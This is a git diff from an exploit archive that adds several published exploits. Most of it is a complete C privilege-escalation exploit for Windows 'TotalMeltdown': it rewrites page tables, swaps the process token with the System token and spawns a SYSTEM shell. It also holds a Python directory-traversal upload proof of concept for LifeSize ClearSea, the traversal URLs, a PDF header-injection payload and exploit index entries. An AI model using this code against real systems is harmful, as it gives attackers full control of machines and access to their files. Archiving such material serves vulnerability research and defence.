<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config>
<template>
<subform name="_">
<pageSet/>
<field id="Hello World!">
<event activity="docReady" ref="$host" name="event__click">
<submit
textEncoding="UTF-16&#xD;&#xA;test: test&#xD;&#xA;"
xdpContent="pdf datasets xfdf"
target="http://example.com/test"/>
</event>
</field>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer <<
/Root <<
/AcroForm <<
/Fields [<<
/T (0)
/Kids [<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
>>]
>>]
/XFA 1 0 R
>>
/Pages <<>>
>>
>>

353
exploits/windows/local/44581.c Normal file
View file

@ -0,0 +1,353 @@
#include "stdafx.h"
#define PML4_BASE 0xFFFFF6FB7DBED000
#define PDP_BASE 0xFFFFF6FB7DA00000
#define PD_BASE 0xFFFFF6FB40000000
#define PT_BASE 0xFFFFF68000000000
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
#pragma pack(push,4)
typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {
UCHAR Type;
UCHAR ShareDisposition;
USHORT Flags;
union {
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Generic;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Port;
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Level;
USHORT Group;
#else
ULONG Level;
#endif
ULONG Vector;
KAFFINITY Affinity;
} Interrupt;
struct {
union {
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Group;
#else
USHORT Reserved;
#endif
USHORT MessageCount;
ULONG Vector;
KAFFINITY Affinity;
} Raw;
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Level;
USHORT Group;
#else
ULONG Level;
#endif
ULONG Vector;
KAFFINITY Affinity;
} Translated;
} DUMMYUNIONNAME;
} MessageInterrupt;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Memory;
struct {
ULONG Channel;
ULONG Port;
ULONG Reserved1;
} Dma;
struct {
ULONG Channel;
ULONG RequestLine;
UCHAR TransferWidth;
UCHAR Reserved1;
UCHAR Reserved2;
UCHAR Reserved3;
} DmaV3;
struct {
ULONG Data[3];
} DevicePrivate;
struct {
ULONG Start;
ULONG Length;
ULONG Reserved;
} BusNumber;
struct {
ULONG DataSize;
ULONG Reserved1;
ULONG Reserved2;
} DeviceSpecificData;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length40;
} Memory40;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length48;
} Memory48;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length64;
} Memory64;
struct {
UCHAR Class;
UCHAR Type;
UCHAR Reserved1;
UCHAR Reserved2;
ULONG IdLowPart;
ULONG IdHighPart;
} Connection;
} u;
} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;
#pragma pack(pop,4)
typedef enum _INTERFACE_TYPE {
InterfaceTypeUndefined,
Internal,
Isa,
Eisa,
MicroChannel,
TurboChannel,
PCIBus,
VMEBus,
NuBus,
PCMCIABus,
CBus,
MPIBus,
MPSABus,
ProcessorInternal,
InternalPowerBus,
PNPISABus,
PNPBus,
Vmcs,
ACPIBus,
MaximumInterfaceType
} INTERFACE_TYPE, *PINTERFACE_TYPE;
typedef struct _CM_PARTIAL_RESOURCE_LIST {
USHORT Version;
USHORT Revision;
ULONG Count;
CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];
} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;
typedef struct _CM_FULL_RESOURCE_DESCRIPTOR {
INTERFACE_TYPE InterfaceType;
ULONG BusNumber;
CM_PARTIAL_RESOURCE_LIST PartialResourceList;
} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;
typedef struct _CM_RESOURCE_LIST {
ULONG Count;
CM_FULL_RESOURCE_DESCRIPTOR List[1];
} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;
struct memory_region {
ULONG64 size;
ULONG64 address;
};
// Very hack'y way of trying to map out physical memory regions to try and reduce
// risk of BSOD
DWORD parse_memory_map(struct memory_region *regions) {
HKEY hKey = NULL;
LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory";
LPTSTR pszValueName = L".Translated";
LPBYTE lpData = NULL;
DWORD dwLength = 0, count = 0, type = 0;;
if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)
{
printf("[*] Could not get reg key\n");
return 0;
}
if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)
{
printf("[*] Could not query hardware key\n");
return 0;
}
lpData = (LPBYTE)malloc(dwLength);
RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);
CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;
for (int i = 0; i < resource_list->Count; i++) {
for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {
if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {
regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;
regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;
regions++;
count++;
}
}
}
return count;
}
int main()
{
printf("TotalMeltdown PrivEsc exploit by @_xpn_\n");
printf(" paging code by @UlfFrisk\n\n");
unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;
DWORD done;
DWORD count;
// Parse registry for physical memory regions
printf("[*] Getting physical memory regions from registry\n");
struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);
count = parse_memory_map(regions);
if (count == 0) {
printf("[X] Could not find physical memory region, quitting\n");
return 2;
}
for (int i = 0; i < count; i++) {
printf("[*] Phyiscal memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size);
}
// Check for vulnerability
__try {
int test = *(unsigned long long *)PML4_BASE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Could not access PML4 address, system likely not vulnerable\n");
return 2;
}
// setup: PDPT @ fixed hi-jacked physical address: 0x10000
// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry
// we can hijack.
for (iPML4 = 256; iPML4 < 512; iPML4++) {
vaPML4e = PML4_BASE + (iPML4 << 3);
if (*(unsigned long long *)vaPML4e) { continue; }
// When we find an entry, we add a pointer to the next table (PDPT), which will be
// stored at the physical address 0x10000
*(unsigned long long *)vaPML4e = 0x10067;
break;
}
printf("[*] PML4 Entry Added At Index: %d\n", iPML4);
// Here, the PDPT table is referenced via a virtual address.
// For example, if we added our hijacked PML4 entry at index 256, this virtual address
// would be 0xFFFFF6FB7DA00000 + 0x100000
// This allows us to reference the physical address 0x10000 as:
// PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100
vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));
printf("[*] PDPT Virtual Address: %p", vaPDPT);
// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages
// Below is responsible for adding 31 entries to the PDPT
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
*(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);
}
// For each of the PDs, a further 512 PT's are created. This gives access to
// 512 * 32 * 2mb = 33gb physical memory space
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
if ((iPDPT % 3) == 0)
printf("\n[*] PD Virtual Addresses: ");
vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));
printf("%p ", vaPD);
for (iPD = 0; iPD < 512; iPD++) {
// Below, notice the 0xe7 flags added to each entry.
// This is used to create a 2mb page rather than the standard 4096 byte page.
*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;
}
}
printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n");
#define EPROCESS_IMAGENAME_OFFSET 0x2e0
#define EPROCESS_TOKEN_OFFSET 0x208
#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base
unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;
unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
printf("[*] Hunting for _EPROCESS structures in memory\n");
for (int j = 0; j < count; j++) {
printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size);
for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {
__try {
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS);
}
}
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS);
}
}
if (systemEPROCESS != 0 && ourEPROCESS != 0) {
// Swap the tokens by copying the pointer to System Token field over our process token
printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);
*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);
printf("[*] Done, spawning SYSTEM shell...\n\n");
CreateProcessA(0,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
NULL,
"C:\\windows\\system32",
&si,
&pi);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Exception occured, stopping to avoid BSOD\n");
return 2;
}
}
}
return 0;
}

11
exploits/windows/remote/44582.txt Normal file
View file

@ -0,0 +1,11 @@
A few years ago, I became aware of a security issue in most Call of Duty games.
Although I did not discover it myself, I thought it might be interesting to see what it could be used for.
Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the hosts system inside a stack-allocated buffer within the games network handling.
In consquence, this allows full remote code execution!
The code has been published as the vulnerability used has been patched on all cod games as of 4/26/2018.
For more information, read the post at https://momo5502.com/blog/?p=34
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44582.zip

72
exploits/windows/webapps/44390.py Executable file
View file

@ -0,0 +1,72 @@
'''
Tittle: LifeSize ClearSea 3.1.4 Directory Traversal Vulnerabilities
Author: rsp3ar <lukunming@gmail.com>
Impact: Remote Code Execution (Post-Authentication)
Recommendation: Use strong password for default 'admin' user and secure management access to the device. Please consult vendor for replacement/alternative solutions.
Timeline:
- 01.29.2018: Open Case 00302227 to notify the vulnerabilities.
- 01.30.2018: Got notified product is EoL as Jan 14 2017 and no longer supported.
- 02.05.2018: Open Case 00302876 to notify the intention of disclosure.
- 03.02.2018: Notify the tentative date for disclosure.
- 03.07.2018: Contacted by LifeSize and discussed the detail of vulnerabilities & discloure.
- 03.31.2018: Public Disclosure
Description
========================================
LifeSize ClearSea is a client/server solution for desktop and mobile video collaboration.
Version 3.1.4 has been End of Life since Jan 14 2017, and suffers from directory traversal
vulnerabilities. After authenticated as admin on Control Panel, attacker will be able to
1) Download arbitrary file; 2) Upload arbitrary file (leading to code execution).
1. Arbitrary file (boot.ini) download via directory traversal vulnerabilities
http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=CDRS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini
http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=LOGS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini
2. Arbitrary file upload
Below POC will create test.txt under C:\
'''
#!/usr/bin/env python
import sys
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RC4-SHA'
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Update target URL and credentials
TARGET = "http://127.0.0.1:8800/"
USERNAME = "admin"
PASSWORD = "admin"
LOGIN_PATH = "smartgui/"
UPLOAD_PATH = "smartgui/upload/-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename/cfcyvcffiv/"
TEST_FILE_NAME = "test.txt"
print("[*] Authenticate with %s..." % (TARGET))
cookies = {}
# Get rootSessionID
r = requests.get(TARGET, verify=False)
cookies["rootSessionID"] = r.cookies["rootSessionID"]
# Get smartguiSessionID
auth_data = {
"smartGuiAuthenticate": "t",
"email": USERNAME,
"password": PASSWORD
}
r = requests.post(TARGET + LOGIN_PATH, data = auth_data, cookies = cookies, verify=False)
if r.cookies.get("smartguiSessionID") == None:
print("[!] Invalid Username or Password")
sys.exit()
cookies["smartguiSessionID"] = r.cookies["smartguiSessionID"]
print("[*] Authentication is successful!")
print("[*] Create remote file C:\\%s..." % (TEST_FILE_NAME))
files = {
"SmartGuiUploadField": (TEST_FILE_NAME, "This is a test file")
}
r = requests.post(TARGET + UPLOAD_PATH + "..\\" * 8 + TEST_FILE_NAME, files = files,
cookies = cookies, verify=False)
if r.status_code == requests.codes.ok:
print("[*] Remote file C:\\%s has been successfully created" % (TEST_FILE_NAME))

41
files_exploits.csv
View file

@ -5799,6 +5799,7 @@ id,file,description,date,author,type,platform,port
42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux,
42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows,
42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple,
44273,exploits/windows/dos/44273.py,"Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow",2018-03-12,"Mohan Ravichandran",dos,windows,
42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows,
42995,exploits/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",dos,windows,
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,
@ -5815,6 +5816,7 @@ id,file,description,date,author,type,platform,port
43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows,
43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple,
43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows,
43116,exploits/windows/dos/43116.py,"Jnes 1.0.2 - Stack Buffer Overflow",2017-11-03,crash_manucoot,dos,windows,
43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows,
43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows,
@ -5853,6 +5855,7 @@ id,file,description,date,author,type,platform,port
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux,
43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows,
43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
43208,exploits/windows/dos/43208.py,"Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow",2017-12-01,ret2eax,dos,windows,
43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
@ -5878,6 +5881,7 @@ id,file,description,date,author,type,platform,port
44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
44189,exploits/windows/dos/44189.py,"Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
44190,exploits/linux/dos/44190.py,"netek 0.8.2 - Denial of Service",2018-02-27,"Lawrence Amer",dos,linux,
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
@ -5926,6 +5930,7 @@ id,file,description,date,author,type,platform,port
44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
44442,exploits/multiple/dos/44442.js,"Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion",2018-04-10,"Google Security Research",dos,multiple,
44451,exploits/hardware/dos/44451.py,"Cisco Smart Install - Crash (PoC)",2018-03-29,embedi,dos,hardware,
44456,exploits/hardware/dos/44456.py,"Barco ClickShare CSE-200 - Remote Denial of Service",2018-04-16,"Florian Hauser",dos,hardware,7100
44458,exploits/windows/dos/44458.cpp,"Microsoft Windows - 'nt!NtQueryFullAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows,
44459,exploits/windows/dos/44459.cpp,"Microsoft Windows - 'nt!NtQueryAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows,
@ -5958,6 +5963,8 @@ id,file,description,date,author,type,platform,port
44561,exploits/macos/dos/44561.txt,"Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules",2018-04-30,"Google Security Research",dos,macos,
44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple,
44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -8557,7 +8564,7 @@ id,file,description,date,author,type,platform,port
25406,exploits/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,local,linux,
25411,exploits/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",local,linux,
25419,exploits/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH)",2013-05-13,seaofglass,local,windows,
25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux,
25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux,
25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,
25450,exploits/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation",2013-05-14,"Andrew Lutomirski",local,linux,
25554,exploits/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",local,windows,
@ -9691,6 +9698,8 @@ id,file,description,date,author,type,platform,port
44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows,
44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows,
44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16148,7 +16157,7 @@ id,file,description,date,author,type,platform,port
41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows,
41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
@ -16437,6 +16446,7 @@ id,file,description,date,author,type,platform,port
44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
44412,exploits/multiple/remote/44412.py,"Adobe Flash < 28.0.0.161 - Use-After-Free",2018-04-06,SyFi,remote,multiple,
44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
@ -16454,6 +16464,10 @@ id,file,description,date,author,type,platform,port
44569,exploits/ruby/remote/44569.rb,"Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
44570,exploits/ruby/remote/44570.rb,"Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
44571,exploits/linux/remote/44571.py,"Exim < 4.90.1 - 'base64d' Remote Code Execution",2018-05-02,straight_blast,remote,linux,25
44574,exploits/hardware/remote/44574.txt,"Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)",2018-05-02,embedi,remote,hardware,
44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware,
44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -18514,7 +18528,7 @@ id,file,description,date,author,type,platform,port
4284,exploits/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,webapps,php,
4286,exploits/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,webapps,cgi,
4291,exploits/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,webapps,php,
4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php,
4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php,
4296,exploits/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,webapps,php,
4300,exploits/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,webapps,php,
4305,exploits/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,webapps,php,
@ -22131,7 +22145,7 @@ id,file,description,date,author,type,platform,port
9459,exploits/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,webapps,php,
9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,webapps,php,
9461,exploits/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,webapps,php,
9462,exploits/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php,
9462,exploits/php/webapps/9462.txt,"Infinity 2.x - 'options[style_dir]' Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php,
9463,exploits/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,webapps,php,
9464,exploits/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,webapps,php,
